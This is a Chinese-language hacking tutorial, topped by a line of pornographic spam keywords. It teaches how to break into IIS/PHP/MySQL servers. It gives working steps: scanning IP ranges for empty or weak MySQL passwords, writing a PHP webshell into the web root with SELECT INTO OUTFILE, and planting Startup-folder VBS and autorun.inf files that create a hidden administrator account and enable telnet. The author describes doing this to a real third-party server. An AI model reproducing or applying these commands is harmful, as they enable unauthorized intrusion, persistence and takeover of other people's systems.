欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

最近好象很流行SQL攻擊，SQL Injection的教程有如雨后春筍，不過(guò)這里我不談SQL-SERVER，來(lái)談?wù)凪YSQL吧。SQL-SERVER的空口令管理員往往都很警惕，但MYSQL就不那么敏感了，因為很多管理員認為MYSQL沒(méi)有SQL-SERVER那樣的擴展儲存，所以很多網(wǎng)站都疏于防范，這就給了我們的機會(huì )，MYSQL+PHP常常被稱(chēng)為完美組合，許多論壇也是這個(gè)結構，下面我就是針對IIS+PHP+MYSQL來(lái)討論的，接著(zhù)往下看吧！ 

一、PHP/MySQL簡(jiǎn)介
SQL（結構化查詢(xún)語(yǔ)言）是世界上最流行和標準化的數據庫語(yǔ)言，它使得存儲、更新和存取信息更容易。例如，你能用SQL語(yǔ)言為一個(gè)網(wǎng)站檢索產(chǎn)品信息及存儲顧客信息，同時(shí)MySQL也足夠快速和靈活以允許你存儲記錄文件和圖像。
MySQL是一個(gè)真正的多用戶(hù)、多線(xiàn)程SQL數據庫服務(wù)器。它是以一個(gè)客戶(hù)機/服務(wù)器結構的實(shí)現，它由一個(gè)服務(wù)器守護程序mysqld和很多不同的客戶(hù)程序和庫組成。MySQL 主要目標是快速、健壯和易用。MySQL建立的基礎是業(yè)已用在高要求的生產(chǎn)環(huán)境多年的一套實(shí)用例程。盡管MySQL仍在開(kāi)發(fā)中，但它已經(jīng)提供一個(gè)豐富和極其有用的功能集。
PHP是一種服務(wù)器端解釋的腳本語(yǔ)言。如果你接觸過(guò)ASP的話(huà)，那么您對于在HTML頁(yè)面中嵌入代碼應該是比較熟悉了。PHP代碼在服務(wù)器一端被解釋轉變成普通的HTML頁(yè)面內容，送給瀏覽器一端。這種模式使得我們可以用它來(lái)完成相當復雜的功能。

二、如何獲得MYSQL弱口令的主機
相信這是讀者們最關(guān)心的事情，其實(shí)只要利用兩個(gè)工具就可以輕松搞定。
工具：HScan v1.20
MysqlCheck
HScan v1.20運行在Windows NT/2000/XP 下，其采用多線(xiàn)程方式對指定IP段或主機列表，進(jìn)行漏洞、弱口令賬號、匿名用戶(hù)檢測的工具，掃描項目包括name、port、ftp、ssh、telnet、smtp、finger、iis、cgi、pop、rpc、ipc、imap、mssql、mysql、cisco、plugin...
它可以大面積掃出有MYSQL弱口令的主機，我曾經(jīng)隨便掃描了一個(gè)C類(lèi)網(wǎng)段，竟然有為數不少的弱口令主機，還有一個(gè)竟然是政府主機，真是令人毛骨悚然。其掃描格式為：
hscan -h 192.168.0.1 192.168.0.254 -ping -mysql
-ping就是掃描前先PING，不過(guò)現在ISP供應商大多都封了PING，所有一般不推薦加上這個(gè)參數。結果如下：（圖1）

三、得到弱口令之后的提升權限
這里，我們先介紹兩個(gè)工具：
1、牛族SuperMysql連接器 V1.7—傻瓜化的軟件
特點(diǎn)：
1）可以無(wú)需安裝MYSQL數據庫，用SuperMysql連接器可以連接遠程MYSQL數據庫。
2）遠程數據庫表直接顯示在程序的顯示框中，無(wú)需手工輸入指令。
3）程序綁定了兩個(gè)MYSQL指令。
修改了兩個(gè)綁定功能：
a）遠程更改密碼時(shí)可以自己定義密碼。
b）可以自定義創(chuàng )建的遠程賬號和密碼。
2、MYSQL自帶連接器
雖然是命令行的，但是很穩定哦。
上面所說(shuō)的兩個(gè)工具都很容易上手，首先來(lái)講講利用“牛族SuperMysql連接器 V1.7”來(lái)得到SHELL吧。下面總結一下網(wǎng)上流行的思路：
1）通過(guò)漏洞或直覺(jué)猜解到Web的物理路徑，然后寫(xiě)入ASP或PHP的SHELL，接著(zhù)提升權限。
2）在每個(gè)盤(pán)符的根目錄下寫(xiě)入autorun.inf與一個(gè)能建立用戶(hù)的VBS腳本。
3）通過(guò)利用Folder.htt，desktop.ini讓管理員執行任意命令。
4）往啟動(dòng)組內寫(xiě)入建立用戶(hù)的VBS腳本。
這樣大家就應該有個(gè)底了吧，現在來(lái)看實(shí)際操作，
我首先通過(guò)HScan v1.20得到一所XX信息港的MYSQL密碼為空，接著(zhù)我啟動(dòng)了牛族SuperMysql連接器 V1.7連了上去，如圖2所示：

圖2
接著(zhù)，我為了得到物理路徑，試著(zhù)在一個(gè)PHP下載軟件系統，提交 

圖3
我很幸運，輕松地得到了Web的物理地址，雖然沒(méi)有盤(pán)符，但是就那么幾個(gè)盤(pán)，很容易猜的。
然后，我在牛族SuperMysql連接器 V1.7的最上面的空白處輸入：
use mysql;
點(diǎn)發(fā)送命令，顯示“命令use mysql;發(fā)送成功！”改指令是進(jìn)入名為mysql的數據庫，然后
create table shuangfeng(cmd TEXT)
選擇在名為mysql的庫中建一個(gè)名叫shuangfeng的表，這個(gè)表只有一個(gè)字段名叫cmd，數據類(lèi)型為T(mén)EXT。然后發(fā)送命令：
insert into shuangfeng values("<?system($c);?>")
這就是在shuangfeng的表里寫(xiě)入<?system($c);?>，其實(shí)這就是PHPSHELL的原代碼，簡(jiǎn)單吧！PHP的功能可是很強大的。然后輸入：
select * from tmp into outfile "c:\\www\\htdocs\\soft\\shuangfeng.php"
返回“命令發(fā)送失敗”。繼續提交：
select * from shuangfeng into outfile "d:\\www\\htdocs\\soft\\shuangfeng.php"
返回“發(fā)送成功”。然后提交：
drop table shuangfeng
上面的命令就是把shuangfeng表的里的數據導出到d:\www\htdocs\soft\存為shuangfeng.php，接著(zhù)刪除shuangfeng的表。
然后我就訪(fǎng)問(wèn)URL：

圖4
返回了對方C盤(pán)里的文件，但是這個(gè)PHPSHELL用起來(lái)很麻煩，也很難看，所以我再次傳了一個(gè)PHPSHELL上去了：

圖5
這樣的SHELL就好多了，然后就是提升權限了。先看看可否建立目錄：
md c:\‘\"Program File"\shuangfeng
結果提示拒絕訪(fǎng)問(wèn)，看來(lái)C盤(pán)是有權限的拉，接著(zhù)
MD D:\shuangfeng
返回“命令成功完成”。
看來(lái)D盤(pán)是沒(méi)有權限限制的，然后看看開(kāi)了什么服務(wù)吧，輸入“net start”，我們將會(huì )看到該計算機中已經(jīng)運行的服務(wù)。通過(guò)分析，我們得出兩個(gè)有用的服務(wù)：MySql、Serv-U FTP Server。
接下來(lái)的思路就很明確了：找到MYSQL或Serv-U的存放地點(diǎn)，然后把木馬上傳到那個(gè)目錄，把原啟動(dòng)程序更名，再把木馬更改成原啟動(dòng)程序的名字，因為C盤(pán)是NTFS的，所有如果放在Program Files，WINNT等等之類(lèi)的目錄下的話(huà)都沒(méi)有權限更改，仔細看了一下，原來(lái)MYSQL和SERV-U都放在Program Files下，看來(lái)是沒(méi)希望了，不過(guò)我們還可以往啟動(dòng)組內寫(xiě)入建立用戶(hù)的VBS腳本，繼續依次提交命令：
use test; 
create table 2(cmd TEXT); 
insert into 2 values ("dim wsh")
……
//往名稱(chēng)為2的表里寫(xiě)入VBS代碼，然后
select * from tmp into outfile "C:\\Documents and Settings\\all users\\「開(kāi)始」菜單\\程序\\啟動(dòng)\\1.vbs" 
drop table tmp
這里用來(lái)將表導出到C:\Documents and Settings\all users\「開(kāi)始」菜單\程序\啟動(dòng)\1.VBS文件中。
(注意所有的"要用""代替)
上面要寫(xiě)入的VBS腳本代碼如下：
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run " net user shuangfeng www.54hack.org /add ",0
wsh.run "net localgroup administrators shuangfeng /add",0
wsh.run "net start telnet",0
重啟后將會(huì )建立了一個(gè)名為shuangfeng，密碼是www.54hack.org的用戶(hù)了，并且開(kāi)了telnet。
如果速度快的話(huà)可以利用一下MS03043漏洞，重啟后就TELNET上去.如果讀者們不能象我一樣幸運但可以看到物理路徑的話(huà)就只能猜咯。
再來(lái)講講利用MYSQL自帶的連接器入侵吧，首先當然是先連接咯，在CMD里輸入：
mysql -h ip -u用戶(hù)名 -p密碼
這樣就可以連接到對方的MYSQL，連接上去后就可以輸入像上面一樣輸入命令，不過(guò)這樣一行一行輸入好象很煩瑣，我們可以制作一個(gè)SQL腳本來(lái)一次完成，制作過(guò)程如下：
1．首先打開(kāi)記事本，把要運行的SQL語(yǔ)句都打上去，這里我輸入：
use mysql;
create table tmp(cmd TEXT)
insert into 2 values ("dim wsh")
insert into 2 values ("set wsh=CreateObject(""WScript.Shell"")")
insert into 2 values ("wsh.run ""net.exe user aaa aa /add"",0")
insert into 2 values ("wsh.run ""net localgroup administrators aaa /add"",0")
insert into 2 values ("wsh.run "net start telnet",0")
select * from tmp into outfile "C:\\Documents and Settings\\all users\\「開(kāi)始」菜單\\程序\\啟動(dòng)\\1.vbs"
drop table tmp
然后保存為shuangfeng.sql,再在CMD里輸入：
mysql -h ip -u用戶(hù)名 -p密碼 <<shuangfeng.sql
回車(chē)后，就自動(dòng)輸入上面的語(yǔ)句了，如果在每行代碼前都添加“insert into tmp values(‘”，末尾都添加“‘)”的話(huà)，工程量是可想而知的，所以我就用了一個(gè)特殊文本編輯器--易優(yōu)超級字典生成器注冊版，它有一個(gè)小功能，在“修改字典”里，如圖6有兩個(gè)選項，一個(gè)是“在每個(gè)密碼前插入字符串”另一個(gè)是“在每個(gè)密碼后插入字符串”不過(guò)由于版面的原因，我這就不再告訴怎么用了，大家自己研究一下吧！不過(guò)注意所有的"都要用""代替。如果要用autorun.inf與VBS來(lái)執行命令的話(huà)，就用上面的方法把autorun.inf和VBS導出到各個(gè)盤(pán)的根目錄吧，autorun.inf如下：
[AutoRun]
OPEN= 2.vbs
VBS腳本代碼就跟2.VBS一樣，剩下的就是等管理員上勾了，